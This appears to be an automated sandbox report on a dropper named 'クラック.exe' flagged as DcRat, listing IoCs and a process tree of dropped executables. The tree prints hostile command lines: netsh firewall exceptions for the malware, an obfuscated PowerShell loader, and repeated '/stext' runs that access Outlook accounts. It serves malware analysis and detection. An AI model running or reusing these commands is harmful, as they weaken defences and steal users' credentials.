172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exesee7.exepid process 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 1916 see7.exe 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
7f1630df6b57af024a3b561bdadc208f.exePowershell.exe57ccb6f0bd910fed428761828ae93553.exeClient.exe5e710462c65fe899466e4fb7c1e33c9a.exe73c1c41b9e71c48e752a5cd19fe808b6.exea6a1abaf12a28ea8f6553356c3bdcf57.exesee7.exeTEST.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.execsrss.exeserver.exesvhost.execbgsujmwws.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exesee7.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exedescription pid process Token: SeDebugPrivilege 2744 7f1630df6b57af024a3b561bdadc208f.exe Token: SeDebugPrivilege 2304 Powershell.exe Token: SeDebugPrivilege 2596 57ccb6f0bd910fed428761828ae93553.exe Token: SeDebugPrivilege 832 Client.exe Token: SeDebugPrivilege 2520 5e710462c65fe899466e4fb7c1e33c9a.exe Token: SeDebugPrivilege 2564 73c1c41b9e71c48e752a5cd19fe808b6.exe Token: SeDebugPrivilege 2936 a6a1abaf12a28ea8f6553356c3bdcf57.exe Token: SeDebugPrivilege 2692 see7.exe Token: SeDebugPrivilege 2124 TEST.exe Token: SeDebugPrivilege 1016 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe Token: SeDebugPrivilege 1652 csrss.exe Token: SeDebugPrivilege 3748 server.exe Token: SeDebugPrivilege 1672 svhost.exe Token: SeDebugPrivilege 572 cbgsujmwws.exe Token: SeDebugPrivilege 2248 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Token: SeDebugPrivilege 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe Token: 33 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe Token: SeIncBasePriorityPrivilege 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe Token: 33 3748 server.exe Token: SeIncBasePriorityPrivilege 3748 server.exe Token: SeDebugPrivilege 484 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe Token: 33 484 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe Token: SeIncBasePriorityPrivilege 484 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe Token: SeDebugPrivilege 1224 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Token: 33 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe Token: SeIncBasePriorityPrivilege 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe Token: 33 3748 server.exe Token: SeIncBasePriorityPrivilege 3748 server.exe Token: 33 484 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe Token: SeIncBasePriorityPrivilege 484 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe Token: 33 1672 svhost.exe Token: SeIncBasePriorityPrivilege 1672 svhost.exe Token: SeDebugPrivilege 3796 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Token: SeDebugPrivilege 1916 see7.exe Token: SeDebugPrivilege 3116 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Token: SeDebugPrivilege 4024 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Token: 33 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe Token: SeIncBasePriorityPrivilege 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe Token: 33 3748 server.exe Token: SeIncBasePriorityPrivilege 3748 server.exe Token: 33 484 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe Token: SeIncBasePriorityPrivilege 484 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe Token: 33 1672 svhost.exe Token: SeIncBasePriorityPrivilege 1672 svhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
virus.jk.exepid process 2984 virus.jk.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
クラック.exe70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe938b92958ded4d50a357d22eddf141ad.exedescription pid process target process PID 1968 wrote to memory of 484 1968 クラック.exe 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe PID 1968 wrote to memory of 484 1968 クラック.exe 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe PID 1968 wrote to memory of 484 1968 クラック.exe 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe PID 1968 wrote to memory of 484 1968 クラック.exe 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe PID 1968 wrote to memory of 2520 1968 クラック.exe 5e710462c65fe899466e4fb7c1e33c9a.exe PID 1968 wrote to memory of 2520 1968 クラック.exe 5e710462c65fe899466e4fb7c1e33c9a.exe PID 1968 wrote to memory of 2520 1968 クラック.exe 5e710462c65fe899466e4fb7c1e33c9a.exe PID 1968 wrote to memory of 2520 1968 クラック.exe 5e710462c65fe899466e4fb7c1e33c9a.exe PID 1968 wrote to memory of 2744 1968 クラック.exe 7f1630df6b57af024a3b561bdadc208f.exe PID 1968 wrote to memory of 2744 1968 クラック.exe 7f1630df6b57af024a3b561bdadc208f.exe PID 1968 wrote to memory of 2744 1968 クラック.exe 7f1630df6b57af024a3b561bdadc208f.exe PID 1968 wrote to memory of 2744 1968 クラック.exe 7f1630df6b57af024a3b561bdadc208f.exe PID 1968 wrote to memory of 2672 1968 クラック.exe 31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe PID 1968 wrote to memory of 2672 1968 クラック.exe 31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe PID 1968 wrote to memory of 2672 1968 クラック.exe 31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe PID 1968 wrote to memory of 2672 1968 クラック.exe 31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe PID 1968 wrote to memory of 2784 1968 クラック.exe 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe PID 1968 wrote to memory of 2784 1968 クラック.exe 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe PID 1968 wrote to memory of 2784 1968 クラック.exe 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe PID 1968 wrote to memory of 2784 1968 クラック.exe 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe PID 1968 wrote to memory of 2596 1968 クラック.exe 57ccb6f0bd910fed428761828ae93553.exe PID 1968 wrote to memory of 2596 1968 クラック.exe 57ccb6f0bd910fed428761828ae93553.exe PID 1968 wrote to memory of 2596 1968 クラック.exe 57ccb6f0bd910fed428761828ae93553.exe PID 1968 wrote to memory of 2596 1968 クラック.exe 57ccb6f0bd910fed428761828ae93553.exe PID 1968 wrote to memory of 2164 1968 クラック.exe 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe PID 1968 wrote to memory of 2164 1968 クラック.exe 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe PID 1968 wrote to memory of 2164 1968 クラック.exe 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe PID 1968 wrote to memory of 2164 1968 クラック.exe 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe PID 1968 wrote to memory of 2564 1968 クラック.exe 73c1c41b9e71c48e752a5cd19fe808b6.exe PID 1968 wrote to memory of 2564 1968 クラック.exe 73c1c41b9e71c48e752a5cd19fe808b6.exe PID 1968 wrote to memory of 2564 1968 クラック.exe 73c1c41b9e71c48e752a5cd19fe808b6.exe PID 1968 wrote to memory of 2564 1968 クラック.exe 73c1c41b9e71c48e752a5cd19fe808b6.exe PID 1968 wrote to memory of 1636 1968 クラック.exe 75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe PID 1968 wrote to memory of 1636 1968 クラック.exe 75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe PID 1968 wrote to memory of 1636 1968 クラック.exe 75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe PID 1968 wrote to memory of 1636 1968 クラック.exe 75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe PID 2164 wrote to memory of 2304 2164 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe Powershell.exe PID 2164 wrote to memory of 2304 2164 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe Powershell.exe PID 2164 wrote to memory of 2304 2164 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe Powershell.exe PID 2164 wrote to memory of 2304 2164 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe Powershell.exe PID 1968 wrote to memory of 1016 1968 クラック.exe 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe PID 1968 wrote to memory of 1016 1968 クラック.exe 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe PID 1968 wrote to memory of 1016 1968 クラック.exe 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe PID 1968 wrote to memory of 1016 1968 クラック.exe 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe PID 1968 wrote to memory of 1612 1968 クラック.exe 938b92958ded4d50a357d22eddf141ad.exe PID 1968 wrote to memory of 1612 1968 クラック.exe 938b92958ded4d50a357d22eddf141ad.exe PID 1968 wrote to memory of 1612 1968 クラック.exe 938b92958ded4d50a357d22eddf141ad.exe PID 1968 wrote to memory of 1612 1968 クラック.exe 938b92958ded4d50a357d22eddf141ad.exe PID 1612 wrote to memory of 2044 1612 938b92958ded4d50a357d22eddf141ad.exe winhlp32.exe PID 1612 wrote to memory of 2044 1612 938b92958ded4d50a357d22eddf141ad.exe winhlp32.exe PID 1612 wrote to memory of 2044 1612 938b92958ded4d50a357d22eddf141ad.exe winhlp32.exe PID 1612 wrote to memory of 2044 1612 938b92958ded4d50a357d22eddf141ad.exe winhlp32.exe PID 1612 wrote to memory of 2044 1612 938b92958ded4d50a357d22eddf141ad.exe winhlp32.exe PID 1612 wrote to memory of 2044 1612 938b92958ded4d50a357d22eddf141ad.exe winhlp32.exe PID 1612 wrote to memory of 2044 1612 938b92958ded4d50a357d22eddf141ad.exe winhlp32.exe PID 1968 wrote to memory of 1776 1968 クラック.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1968 wrote to memory of 1776 1968 クラック.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1968 wrote to memory of 1776 1968 クラック.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1968 wrote to memory of 1776 1968 クラック.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1968 wrote to memory of 2936 1968 クラック.exe a6a1abaf12a28ea8f6553356c3bdcf57.exe PID 1968 wrote to memory of 2936 1968 クラック.exe a6a1abaf12a28ea8f6553356c3bdcf57.exe PID 1968 wrote to memory of 2936 1968 クラック.exe a6a1abaf12a28ea8f6553356c3bdcf57.exe PID 1968 wrote to memory of 2936 1968 クラック.exe a6a1abaf12a28ea8f6553356c3bdcf57.exe PID 1968 wrote to memory of 776 1968 クラック.exe BTZ.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
cbgsujmwws.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cbgsujmwws.exe -
outlook_win_path 1 IoCs
Processes:
cbgsujmwws.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cbgsujmwws.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Modifies data under HKEY_USERS
PID:492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService1⤵PID:272
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1140
-
C:\Users\Admin\AppData\Local\Temp\クラック.exe"C:\Users\Admin\AppData\Local\Temp\クラック.exe"2⤵
- DcRat
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe"C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe"C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520 -
C:\Windows\ja-JP\csrss.exe"C:\Windows\ja-JP\csrss.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
-
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe"C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe"C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2672 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3748 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:3992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Exsample.exe5⤵
- Kills process with taskkill
PID:1728
-
-
-
-
C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe"C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2784 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:1400
-
-
-
C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe"C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l33fxnxi\l33fxnxi.cmdline"4⤵PID:3476
-
-
-
C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
-
C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dIWYf8qQ0n.bat"4⤵PID:4068
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:25⤵PID:3412
-
-
C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\System.exe"C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\System.exe"5⤵
- Executes dropped EXE
PID:3644
-
-
-
-
C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe"C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1636
-
-
C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1016 -
C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3592
-
-
-
C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe"C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\winhlp32.exewinhlp32.exe -x4⤵
- System Location Discovery: System Language Discovery
PID:2044
-
-
C:\Windows\winhlp32.exewinhlp32.exe -x4⤵
- System Location Discovery: System Language Discovery
PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\fwclt.exeC:\Users\Admin\AppData\Local\Temp\fwclt.exe C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe4⤵
- Executes dropped EXE
PID:3112
-
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1776 -
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\meozuzmepyprwiwkftubkrpvszl"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:884
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wytsvkxgdghezpsowehcnejmtfdbevf"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2564
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hazkwcizzozjjdgafobwyjevcmncxgwznr"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\odffuuygobnuaqvohopsbjxcwksfs"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3964
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ygsxumiicjfzkwjsqzcmeorlfzkottpj"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1864
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bayqv"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gjzsswyoawukjrxosgpaqpktzppk"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2920
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qleltojioemolytsbrkbttfcieztgfq"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3764
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sfkduhtjbuetvmiwtcwdegztqkrczqgxpx"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3796
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xplnryzpdyarktagdrxpwmxkcc"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3856
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\irqysqjqzgseuzwkmckrhzstljwyu"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2900
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\kldqsjuknpkjwnkwemwskmnktpghvdzg"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
